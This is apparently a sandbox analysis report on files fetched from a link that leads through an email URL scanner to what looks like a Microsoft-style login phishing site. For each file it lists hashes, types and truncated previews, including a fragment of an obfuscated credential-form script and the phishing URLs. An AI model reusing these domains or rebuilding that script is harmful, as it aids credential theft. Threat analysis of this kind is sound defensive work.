                                    SHA-256:8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
                                    SHA-512:B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
                                    Malicious:false
                                    Reputation:low
                                    URL:https://gth.miconlinestickbu.store/ASSETS/img/sig-op.svg
                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 1440x1018, components 3
                                    Category:dropped
                                    Size (bytes):140512
                                    Entropy (8bit):7.936230995454499
                                    Encrypted:false
                                    SSDEEP:3072:PbR0H6rlco6GbAVySoR/NSJqhfl63gq26Pd5DQUHTklE/Tm+D9:DR0KvbAcSxufwV5rHTk+/l9
                                    MD5:41DD29DDD14473A2B95F910C8D817473
                                    SHA1:C241CD5A158E257F6ADBC927B349886497561EDD
                                    SHA-256:126308450DE5137A72687784E6B562811E404A3CF7EF62CF5E7A5986555A5E38
                                    SHA-512:C2FC58D71F0689343FC6E46CDE73854ACC9AF50FA1F9A85DB0BF4D3AE16680C922226CCA45414E262DBAC9FAB1D78FC017D3A4EEBEB7AD5DC6C54F5F0A4AB75A
                                    Malicious:false
                                    Reputation:low
                                    Preview:......JFIF.....H.H.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((........................................................................................{.....................................................................(......@....................@........(................................(.......@..P.... .......... ........... ..................................*...QD...@...@.. .........P..............................................AP*...@........... ........... .(.......(.@................................AQU..P,........@.....@..@....@..........!HR....................@.....P........J..-..(Ah.P................$......................@........T@...........(...@...J..l.YPZ ......................@..P ..............................@.@. .........J..,...*(P..h"..P... .. .@...@.............@.......................J......@.....`.T.QeKD..B.D........(......(X...D..`.........(........................(
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (65462)
                                    Category:downloaded
                                    Size (bytes):423046
                                    Entropy (8bit):5.438572506520833
                                    Encrypted:false
                                    SSDEEP:3072:/6UQptC+C+OgOh2nXQbyDlgVeeqWxtZE5XIaQ0Sh2qC6k8ukH8UmXS1ooW1Kz:/6ez+OwieOmqTky8U81K
                                    MD5:FED72784CBCB19D9375B283B432D7B3B
                                    SHA1:3012BE15099BEE5AFC416D150C4616A0A418A8D0
                                    SHA-256:A9DBEF011641348EC3C7A812DD3EB4871E6C971A66870630D8641C56DE39AF69
                                    SHA-512:DDC9DCF5C63468694A1CD752DB8B1E2B2A7562DCF6BBEBFCEABEDFB2848FDA4496EFFC6923BA86BD5F0BB3A32B6044292167A97AC8E9330F84D42BF991160015
                                    Malicious:false
                                    Reputation:low
                                    URL:https://url12.mailanyone.net/static/js/2.fde2ca04.chunk.js
                                    Preview:/*! For license information please see 2.fde2ca04.chunk.js.LICENSE.txt */.(this["webpackJsonpvp-webapp-clicksmart"]=this["webpackJsonpvp-webapp-clicksmart"]||[]).push([[2],[function(e,t,n){"use strict";e.exports=n(420)},function(e,t,n){var r=n(3),o=n(18).f,i=n(24),a=n(20),u=n(106),c=n(147),s=n(68);e.exports=function(e,t){var n,l,f,p,d,h=e.target,v=e.global,g=e.stat;if(n=v?r:g?r[h]||u(h,{}):(r[h]||{}).prototype)for(l in t){if(p=t[l],f=e.noTargetGet?(d=o(n,l))&&d.value:n[l],!s(v?l:h+(g?".":"#")+l,e.forced)&&void 0!==f){if(typeof p===typeof f)continue;c(p,f)}(e.sham||f&&f.sham)&&i(p,"sham",!0),a(n,l,p,e)}}},function(e,t){e.exports=function(e){try{return!!e()}catch(t){return!0}}},function(e,t,n){(function(t){var n=function(e){return e&&e.Math==Math&&e};e.exports=n("object"==typeof globalThis&&globalThis)||n("object"==typeof window&&window)||n("object"==typeof self&&self)||n("object"==typeof t&&t)||function(){return this}()||Function("return this")()}).call(this,n(56))},function(e,t,n){e.ex
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                    Category:dropped
                                    Size (bytes):15406
                                    Entropy (8bit):2.932954551863506
                                    Encrypted:false
                                    SSDEEP:48:M7yRB52gkEWMIII9UzVK+KZ72p56tQOPk9GPU5NX5uezdAhllSM0H:6/g9pviRw62F4SNX5K0
                                    MD5:9D62DCC244C0F3D88367A943BA4D4FED
                                    SHA1:5FC5EC953D4344422EB686B9FC61EA31CAED360E
                                    SHA-256:FDDF75D3376BB911DB3189AA149F508317799B10611438B23D688B89DB208DA7
                                    SHA-512:78CD9A7A2CDAFCC378A3CB1215325BE78D54A4459D5C4C7271DE617A272AAD10A951BD7F2EFE15EBF4E70A059420D988AC093C481AF02C788D864AA9E316DF22
                                    Malicious:false
                                    Reputation:low
                                    Preview:............ .h...6... .... .(.......00.... .h&......(....... ..... .....................................................................................................................C!!.........................................................U**.G%..H% Y....................................................I%..G$..G%..UU..............................................F##.H$..G$..H$..N''.............................................H%..G$..G$..H%..............................................G&!6H$..G$..H$..L"".............................................H$..G$..G$..H%..%q.%r.%r.'o.'............................G'.VG$..G$..G%..U**.$q.~$q..$q..$q..3f..........................H$..G$..G$..I$.b.... ...$q..$q..$q..&q.s........................G$..G$..H$..UU..........$q.M$q..$q..$q..'l......................H% YG$..G#.A................%r.$q..$q..$r..................`..f.V2$\.q..q..q..q..q.>|.)$r..$q..$q..%s.>........j..j..j..j..j..j..j..j..j..k.(s.$q..$q..%q..@....jv.j..
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                    Category:downloaded
                                    Size (bytes):105369
                                    Entropy (8bit):5.240719144154261
                                    Encrypted:false
                                    SSDEEP:1536:l+gu2w+EEnazA/PWrF7qvEAFiQcpmQoDZztVEHn8:E6CEVEH8
                                    MD5:8E6B0F88563F9C33F78BCE65CF287DF7
                                    SHA1:EF7765CD2A7D64ED27DD7344702597AFF6F8C397
                                    SHA-256:A7057BEBFFF43E7281CA31DA00D40BD88C8D02D1576B9C45891DD56A3853269A
                                    SHA-512:7DCE31D45ACA40340490B9F437A22ADF212B049DE0D4DDEB908A50C1F5C6C7B5561323B3A93B6ED3E5A7C44D7170460BFF8D8722749191C0F5A8DBD83E093E7F
                                    Malicious:false
                                    Reputation:low
                                    URL:https://gth.miconlinestickbu.store/APP-617b5a702a34daddd03071650f95cbe6664e0aa557459/617b5a702a34daddd03071650f95cbe6664e0aa55745b
                                    Preview:html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:bold}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-0.5em}sub{bottom:-0.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (7043), with no line terminators
                                    Category:downloaded
                                    Size (bytes):7043
                                    Entropy (8bit):5.2804407743048944
                                    Encrypted:false
                                    SSDEEP:192:wtIrjU2y/QZN5uvVRQ+tslFqEMkewx+No91m8mq9Ana1opn:wKXU2y/QZN5uvVyFq7kew0xLa1Y
                                    MD5:B6C202188699B897BB727A68EDD24665
                                    SHA1:FF3B891E06C983DCA277C1D7D874C8EB8084EB96
                                    SHA-256:184A034CB9202937BF012AFF8C81E0747B7CA8F8F9E6115556FDB09D5BAEC419
                                    SHA-512:AD8D243B156841EC27CA057CF1E0F64B8802E0DF64F79000739605CDE2C9A9FA1E3E24D153AB34A7AA66F726FC701816CA116052F4129AF3FB78D8F4057EE9F8
                                    Malicious:false
                                    Reputation:low
                                    URL:https://gth.miconlinestickbu.store/js/617b5a702a34daddd03071650f95cbe6664e0aa35f13a
                                    Preview:var _0x22d5b4=_0xe936;function _0xe936(_0x110d0f,_0x2b91a9){var _0x5afc29=_0x2e89();return _0xe936=function(_0x5e8034,_0x1649af){_0x5e8034=_0x5e8034-0x12d;var _0x41bfe8=_0x5afc29[_0x5e8034];return _0x41bfe8;},_0xe936(_0x110d0f,_0x2b91a9);}(function(_0x18f255,_0x432ca9){var _0xb8cc2=_0xe936,_0x553352=_0x18f255();while(!![]){try{var _0x1c3eea=-parseInt(_0xb8cc2(0x161))/0x1+-parseInt(_0xb8cc2(0x132))/0x2+parseInt(_0xb8cc2(0x154))/0x3+-parseInt(_0xb8cc2(0x16c))/0x4+parseInt(_0xb8cc2(0x12e))/0x5+parseInt(_0xb8cc2(0x174))/0x6+-parseInt(_0xb8cc2(0x136))/0x7;if(_0x1c3eea===_0x432ca9)break;else _0x553352['push'](_0x553352['shift']());}catch(_0x104ec1){_0x553352['push'](_0x553352['shift']());}}}(_0x2e89,0x62b01));function _0x2e89(){var _0x35743b=['log','under','prototype','usernameError','disabled','search','progressBar','removeClass','<br/>','each','json','trace','style','querySelector','opacity','none','i0116','value','location','removeAttr','reset','log_form','now','redirect','reload','.light
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:SVG Scalable Vector Graphics image
                                    Category:downloaded
                                    Size (bytes):3651
                                    Entropy (8bit):4.094801914706141
                                    Encrypted:false
                                    SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                    MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                    SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                    SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                    SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                    Malicious:false
                                    Reputation:low
                                    URL:https://gth.miconlinestickbu.store/o/617b5a702a34daddd03071650f95cbe6664e0aa557579
                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 136 x 136, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):15427
                                    Entropy (8bit):7.976208190934027
                                    Encrypted:false
                                    SSDEEP:384:/H9c1vCJgz2GixyL8u6UmL1rUACEviw+sv+ADNRmkx44mliXd15:/CXixlubmhBqwJ+QTOKd15
                                    MD5:D1BAE3D1E005483AC7872D49A442CC63
                                    SHA1:196B857575A97F75028B876B924957E800BC1F43
                                    SHA-256:72C57CDA41C26F93F43F16C230B7778E996A43AC7FA4D509CD473B3887596ADB
                                    SHA-512:68C1C9CA3F5E3FCE687BAE77A7D922640FF9676B40A299CC66F5216F6C81BC2D6F1C32A2D9662E4673FEFB17B795E2DE920FBE3D49DF6716B68A0CB43071F1B3
                                    Malicious:false
                                    Reputation:low
                                    Preview:.PNG........IHDR.............<..R....sRGB.......;.IDATx..}.x\...VKj.....5.c..lLX.2Y...@.0..f.-3......Mf^.$L ....0..'L2.%.......l.[.,..-k.%.;..:..o_I-.......:Uu...v=.9.^|.E..?.DYK...I..ekr2..;04.j$...Q.OJL.$$$.B..eyG=.........y.FB..1............}=.>.Xm........C/.LOO.....:|..7..k...... ^{........MI.Y...SV..e.........P(d.F.Mf........d...F..O9+.6'.....................oo].pa..7..i..f6.... .x...5..HbR.....i.Y.).I.Q..\.\.T.\...._.. P.BF.~<.....I.....X.og.p......mK*.~......?....O>..m..G.9.K..\...O.........(h*..0.].hM.E..,n.....!...l....F.o....S.E.E.........$....{...._.._.....m.......}...H........!P.O......4......%j..O. ....@c".`.t...N.>{...|.Tg..... ..s....;9.l.54R.....E!.....F.Q.....(d7..0....>R.....c`.|5/F*.A../..WD.....;..e.}.....<........:..Y...Gi..wsJ~..f...<^.*....Y..p.eP.@.@P@....N...0.I..AKq*>.*U....'".:~zM......4...,....z..l...rV....(....../...WH. d.&_....a..d......Z.....a.CE.....#...qj^.....+'./.H..pv..F..+..|.....K...}...[...&.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:HTML document, ASCII text, with very long lines (3999), with no line terminators
                                    Category:downloaded
                                    Size (bytes):3999
                                    Entropy (8bit):5.384768440412467
                                    Encrypted:false
                                    SSDEEP:96:zPIuC7Rem55iH+CBiTlQhQ1oR8znTLmoCcZeX6pR:0uqRViH+CITlQhQ1oyznT+cw6H
                                    MD5:CAB6057F3FB0BD14FDB154C9636F2ACD
                                    SHA1:DEE42B01B6C0C8C4244309249BED3DAC8A875CAF
                                    SHA-256:48CC5FBCA021072CF7BE4F476DDF522623AA9ABF483623E1722A92F074644324
                                    SHA-512:7363C7604577AB5FFFE08D60BCD92852FB9724B8B95A08D8CD910859EC17EE7C57ADFB7AA39B54344CA89C830E0EDD94776DA47D924AA389C48FEF5C6C7D814E
                                    Malicious:false
                                    Reputation:low
                                    URL:https://url12.mailanyone.net/scanner?m=1s9N28-0000qa-3G&d=4%7Cmail%2F90%2F1716288000%2F1s9N28-0000qa-3G%7Cin12d%7C57e1b682%7C11949542%7C14589158%7C664C7BD820EF00EA9CDA64C5861AF4A9&o=%2Fphta%3A%2Fvtslekssiaipcr.te%2Ftoenscino-x-pk%2F6tRunvbhyfphp.x&s=qPX4ToIpiLV6GTYf9V69nGT5pss
                                    Preview:<!doctype html><html lang="en"><head><meta charset="utf-8"/><link rel="icon" href="/favicon.ico"/><meta name="viewport" content="width=device-width,initial-scale=1"/><meta name="theme-color" content="#000000"/><meta name="description" content="VIPRE Email Security URL Protection"/><title>URL Protection | VIPRE Email Security</title><link href="/static/css/main.2768b4bf.chunk.css" rel="stylesheet"></head><body><noscript>You need to enable JavaScript to run this app.</noscript><div id="root"></div><script>!function(e){function t(t){for(var n,o,c=t[0],i=t[1],l=t[2],f=0,p=[];f<c.length;f++)o=c[f],Object.prototype.hasOwnProperty.call(a,o)&&a[o]&&p.push(a[o][0]),a[o]=0;for(n in i)Object.prototype.hasOwnProperty.call(i,n)&&(e[n]=i[n]);for(s&&s(t);p.length;)p.shift()();return u.push.apply(u,l||[]),r()}function r(){for(var e,t=0;t<u.length;t++){for(var r=u[t],n=!0,o=1;o<r.length;o++){var i=r[o];0!==a[i]&&(n=!1)}n&&(u.splice(t--,1),e=c(c.s=r[0]))}return e}var n={},o={1:0},a={1:0},u=[];function c
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (4962)
                                    Category:downloaded
                                    Size (bytes):5010
                                    Entropy (8bit):5.3247438309708635
                                    Encrypted:false
                                    SSDEEP:96:t73pKmDZxs9Iwbfln62gb0ZZRiiB4hA/27A3hGj60nV:ZsCZe9IwLlnRgb0HUCy7+fk
                                    MD5:49864A8E125D378BCB2C452E5F949AB9
                                    SHA1:16813CF45B19A19293AE85ECC3D7E6E18F95E75C
                                    SHA-256:0ED4CE10806A4CFFBC0A283BEF8AD076EDF2D070A3F72979F825595790966EEE
                                    SHA-512:B375DFE76BDB7DC954CC68A451EE7AA166709A0735970DCFAA2B60EEEA3C7C83C1040288D96318131716A3B573DF2D1BD1A0803115784BD6E428F7EF2C97975A
                                    Malicious:false
                                    Reputation:low
                                    URL:https://url12.mailanyone.net/static/js/main.fbcc4ef1.chunk.js
                                    Preview:(this["webpackJsonpvp-webapp-clicksmart"]=this["webpackJsonpvp-webapp-clicksmart"]||[]).push([[0],{134:function(n,t,e){"use strict";function c(n){window.location.href=n}e.d(t,"a",(function(){return c})),e.d(t,"b",(function(){return r})),e.d(t,"c",(function(){return s}));var o=e(0),a=e(97);function r(n,t){Object(o.useEffect)((function(){!function(n,t){var e=a.a.t("URL Protection"),c=a.a.t("VIPRE Email Security");document.title="".concat(null!==n&&void 0!==n?n:e," | ").concat(null!==t&&void 0!==t?t:c)}(n,t)}),[n,t])}function s(n,t){var e=Object(o.useRef)(),c=Object(o.useRef)((function(){}));return Object(o.useEffect)((function(){e.current=n}),[n]),Object(o.useEffect)((function(){if(null!==t){var n=setInterval((function(){e.current&&e.current()}),t),o=function(){clearInterval(n)};return c.current=o,o}}),[t]),{clear:c.current}}},138:function(n,t,e){"use strict";var c;e.d(t,"a",(function(){return c})),function(n){n.INFO="INFO",n.WARNING="WARNING",n.DANGER="DANGER"}(c||(c={}))},207:function(
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:SVG Scalable Vector Graphics image
                                    Category:downloaded
                                    Size (bytes):1864
                                    Entropy (8bit):5.222032823730197
                                    Encrypted:false
                                    SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                    MD5:BC3D32A696895F78C19DF6C717586A5D
                                    SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                    SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                    SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                    Malicious:false
                                    Reputation:low
                                    URL:https://gth.miconlinestickbu.store/x/617b5a702a34daddd03071650f95cbe6664e0aa557460
                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):11019
                                    Entropy (8bit):6.058309719303204
                                    Encrypted:false
                                    SSDEEP:192:foXLqXQJ0IgDqutxnw2UQxmVeXud/uKDG5x/X9EE2XbzhkEmk/lqqRrYQiVMPMk:f4eXO07nn7mVIuJLG5hX9ZEdkgD5OMPJ
                                    MD5:80CFBA73F617C5F95A23A6F64ED167A0
                                    SHA1:E3A855D943EF7DAB2A7AACA772807BDB17CBE326
                                    SHA-256:2BBF48D295420B46CE34D58894C244B7DFFDDE9DCABCE0A44AC6E31D1E6CC551
                                    SHA-512:357783BFE92C13C8D3C4B8510F4782A95EC40A2CF27D599BCE109BDA2C7C7D8B268EAD56D811C600A59E70ED0885DF9DE6A3523463941671DAF2B45930B978D0
                                    Malicious:false
                                    Reputation:low
                                    Preview:{"verdict":1,"original_url":"https://vakspecialisten.store/noki/x-cp-Ruytfvb6hnx.php","landing_url":"https://gth.miconlinestickbu.store/","features":["Use set interval","Use set timeout"],"cus_prefs":{"branding_logo":"iVBORw0KGgoAAAANSUhEUgAAAVgAAABACAYAAABfnm8CAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAALiMAAC4jAXilP3YAABzHSURBVHhe7Z0HmBzFlce1S+YMIotgjEgiZxtjjMkcyZyOHE0QRzyCAIE4MBYgskmSQCST4e4wQcKIw8gEE4+cgwCBwYgMEkggIUsC//7db/abmZ2ZrqruSUv/vu9tVfXUexW6t7q6urqq47vvvvtFr169focsi3QgrcQ3yAvILR0dHWOR76OjAVDO+XD2RrbFzlI69v3333fi/Iv8RSiNd5DTOjs7n4yO5OTk5IRAw/MJDU3LQz4fR1aybDuDqm4i+yGfx5bcIP4EnNnMTE5OTo436sHNH3tbG3qd6mk/RaO3UXwkGeJ2IBehex2ysB12RT1b1U9OTk5OEGqArsPdLw62PuT3U5zVeXz/LD5SHXqhB9Kw/sGCXpDONaRxoAWDIQ/H42j4JYTp5P94ZKaFGwb5XhJnU2RlZCHE52ZzMXX3pvlrQj3Pi2yMdx1kCWR2Ha/AW9i8yPxVwVZv5GwLthJTkcnIR8h45CXK8wVuEJwfdYzOiUMtxXfIFERlex95jev39Xpcw5xntV9r4t0QWQ4pH+5rNh/rRC2FTCajbQP5vcYKUBXiLIpMNBUv0JuELGamUoGdQWY2CPS3MVMNgfQ2QO5BZlkWvEDvZjNVE+IthgxHnK494l1mqjUh3iam0tKQT/ES3lNxl7HsO4PeppGhNo
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (50758)
                                    Category:downloaded
                                    Size (bytes):51039
                                    Entropy (8bit):5.247253437401007
                                    Encrypted:false
                                    SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
                                    MD5:67176C242E1BDC20603C878DEE836DF3
                                    SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                    SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                    SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                    Malicious:false
                                    Reputation:low
                                    URL:https://gth.miconlinestickbu.store/boot/617b5a702a34daddd03071650f95cbe6664e0aa35f139
                                    Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 83 x 22, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):61
                                    Entropy (8bit):4.035372245524405
                                    Encrypted:false
                                    SSDEEP:3:yionv//thPlSRtKhBxl/k4E08up:6v/lhPkmhB7Tp
                                    MD5:B5F0F5E60A49DDC157538FBED76751D3
                                    SHA1:5CFDFF071C8B382F185B2E48D9A6B11F071C81CC
                                    SHA-256:FFFC75DC8EB914F0D43C2DC509D89F45A49844B21C60E7049A2A955F4C2B703B
                                    SHA-512:A5306E105B4FEE0D5A50D97E2777A99BF4FCE2046A775F6C94E90508ED4F64590B700A786F5F17ABD079BA21D51BF4305C7F270D84375F516B1CEA8C19060901
                                    Malicious:false
                                    Reputation:low
                                    Preview:.PNG........IHDR...S.........3E7.....IDAT.....$.....IEND.B`.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):61
                                    Entropy (8bit):3.990210155325004
                                    Encrypted:false
                                    SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                    Malicious:false
                                    Reputation:low
                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (32065)
                                    Category:downloaded
                                    Size (bytes):85578
                                    Entropy (8bit):5.366055229017455
                                    Encrypted:false
                                    SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                                    MD5:2F6B11A7E914718E0290410E85366FE9
                                    SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                    SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                    SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                    Malicious:false
                                    Reputation:low
                                    URL:https://gth.miconlinestickbu.store/jq/617b5a702a34daddd03071650f95cbe6664e0aa35f135
